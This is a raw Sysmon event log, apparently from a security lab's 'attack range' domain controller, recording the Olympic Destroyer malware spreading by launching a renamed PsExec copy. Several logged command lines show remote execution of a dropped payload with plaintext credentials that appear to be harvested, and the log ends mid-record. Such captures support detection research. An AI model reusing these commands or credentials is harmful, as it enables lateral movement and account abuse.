10:57:17.652{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.652{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.652{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.652{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.652{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2E06-000000003802}7044C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.652{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2E06-000000003802}7044C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.637{C8EA50B7-130D-6216-2E06-000000003802}70442732C:\Windows\system32\conhost.exe{C8EA50B7-130D-6216-2C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.621{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2E06-000000003802}7044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.599{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2E06-000000003802}7044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.584{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.584{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.584{C8EA50B7-12E6-6216-4B05-000000003802}67926936C:\Temp\olympic_destroyer.exe{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.585{C8EA50B7-130D-6216-2D06-000000003802}7080C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 534500x8000000000000000292733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.568{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292732Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.568{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292731Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.568{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292730Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:17.537{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 11241100x8000000000000000292729Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.521{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\Temp.lnk2022-02-23 10:57:17.521 11241100x8000000000000000292728Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.470{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\drop.lnk2022-02-23 10:57:17.470 10341000x8000000000000000292727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.470{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.453{C8EA50B7-12E6-6216-4B05-000000003802}67926924C:\Temp\olympic_destroyer.exe{C8EA50B7-130D-6216-2C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.464{C8EA50B7-130D-6216-2C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.453{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.453{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2B06-000000003802}5836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.453{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2B06-000000003802}5836C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000292721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.453{C8EA50B7-130D-6216-2806-000000003802}6820C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000292720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.437{C8EA50B7-130D-6216-2B06-000000003802}58362424C:\Windows\system32\conhost.exe{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000292719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:17.437{C8EA50B7-130D-6216-2806-000000003802}6820C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000292718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.418{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2B06-000000003802}5836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.400{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2B06-000000003802}5836C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.400{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.384{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2A06-000000003802}6876C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.384{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-130D-6216-2A06-000000003802}6876C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.353{C8EA50B7-130D-6216-2A06-000000003802}68766308C:\Windows\system32\conhost.exe{C8EA50B7-130D-6216-2806-000000003802}6820C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.284{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2A06-000000003802}6876C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.284{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130D-6216-2A06-000000003802}6876C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:17.268{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-130D-6216-2906-000000003802}6612C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292709Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 